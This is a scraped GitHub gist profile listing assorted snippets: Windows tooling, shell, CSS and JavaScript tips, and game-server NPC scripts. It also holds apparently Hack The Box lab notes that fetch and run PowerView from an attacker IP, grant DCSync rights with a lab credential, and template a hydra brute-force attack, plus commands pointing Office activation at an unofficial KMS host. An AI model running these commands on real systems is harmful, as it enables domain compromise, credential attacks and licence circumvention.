Skip to content

Instantly share code, notes, and snippets.

View jsdryan's full-sized avatar
🏠
Working from home

Justin Wu jsdryan

🏠
Working from home
  • Taiwan
  • 18:07 (UTC +08:00)
View GitHub Profile
@jsdryan
jsdryan / .. MediaCreationTool.bat ..md
Created May 25, 2021 05:37 — forked from AveYo/.. MediaCreationTool.bat ..md
Universal MediaCreationTool wrapper for all MCT Windows 10 versions from 1507 to 21H1 with business (Enterprise) edition support

use download ZIP button or pastebin link to get the script, as saving the Raw file breaks line endings

Preview

Dialogs to pick version, then to pick Default (vanilla MCT) and Auto-Upgrade or Create-Media (enhanced)

Enhanced script name args parsing - just rename the script with:
auto MediaCreationTool.bat to auto upgrade 21H1 - unattended, usually straight to desktop
auto update 1909 MediaCreationTool.bat to auto upgrade 1909 with Dynamic Update (latest LCU)
pro auto 20H2 MediaCreationTool.bat to auto upgrade 20H2 and force Professional edition

@jsdryan
jsdryan / install.sh
Last active November 1, 2021 08:31
zsh-navigation-tools install
#!/bin/sh
if ! type git 2>/dev/null 1>&2; then
echo "Please install GIT first"
echo "Exiting"
exit 1
fi
#
# Clone or pull
.mac {
font-family: 'Operator Mono SSm';
}
// Show content if first variable is ture.
const theBoolean = true;
const thing = 'the awesome thing';
theBoolean && thing; // the awesome thing
// Judge the boolean of 'undefined', '', false
let userInput = '';
!!userInput; // false
let userInput; = undefined;
# Attack machine
git clone https://github.com/PowerShellMafia/PowerSploit/
cd /root/Repos/PowerSploit/Recon
python -m SimpleHTTPServer 80
# Vimtim
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.45:5555/PowerView.ps1')
Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members svc-alfresco; $username = "htb\svc-alfresco"; $password = "s3rvice"; $secstr = New-Object -TypeName System.Security.SecureString; $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}; $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr; Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'svc-alfresco' -TargetIdentity 'HTB.LOCAL\Domain Admins' -Rights DCSync
net group 'Exchange Windows Permissions'
hydra -l ACCOUNT_NAME -P PASSWORD_LISR_FILE TARGET_HOST http-post-form "FORM_ELEMENT:ERROR_MSG"
@jsdryan
jsdryan / honeypot_counts.txt
Created July 14, 2023 07:16 — forked from bgulla/honeypot_counts.txt
Passwords attempted over a 5-day period on a PORT 22 ssh honeypot.
204 password
193 123456
144 admin
125 support
116 123
114 1234
105 default
99 12345
97 1
84 ubnt
@jsdryan
jsdryan / Office_kms
Created August 4, 2023 06:27 — forked from mokoshalb/Office_kms
KMS server Windows
cd\Program Files\Microsoft Office\Office16
cd\Program Files (x86)\Microsoft Office\Office16
cscript OSPP.VBS /sethst:kms.digiboy.ir
cscript OSPP.VBS /actcscript OSPP.VBS /dstatus
slmgr.vbs /ckms
@jsdryan
jsdryan / 2101018.js
Last active April 15, 2024 17:50
快樂貓 MS Script 教學 - 第 9 課(販賣道具)
// 影片教學網址:https://youtu.be/QkQTn7SUdsQ?si=sUay4PJlyYwWqJ_7
// 使用 NPC 編號:2101018 - 杰薩勒(親衛隊長)
var status = -1; // 狀態
var selected; // 選擇的物品
var count; // 購買的數量
// [物品ID, 價格, 數量]
var grocer = [
[2000000, 5000, 5],
@jsdryan
jsdryan / 2101018_exercise.js
Last active April 16, 2024 10:44
快樂貓 MS Script 教學 - 第 10 課(製作道具)
// 影片教學網址:https://youtu.be/QkQTn7SUdsQ?si=sUay4PJlyYwWqJ_7
// 使用 NPC 編號:2101018 - 杰薩勒(親衛隊長)
var status = -1; // 狀態
var selected; // 選擇的物品
var count; // 購買的數量
// 裝備列表 - id: 裝備 ID, materials: 材料列表
// 材料列表 - id: 材料 ID, quantity: 數量
// 例如:冰凍帽 = 1003741, 冰塊 x 10, 白魔道之帽 x 1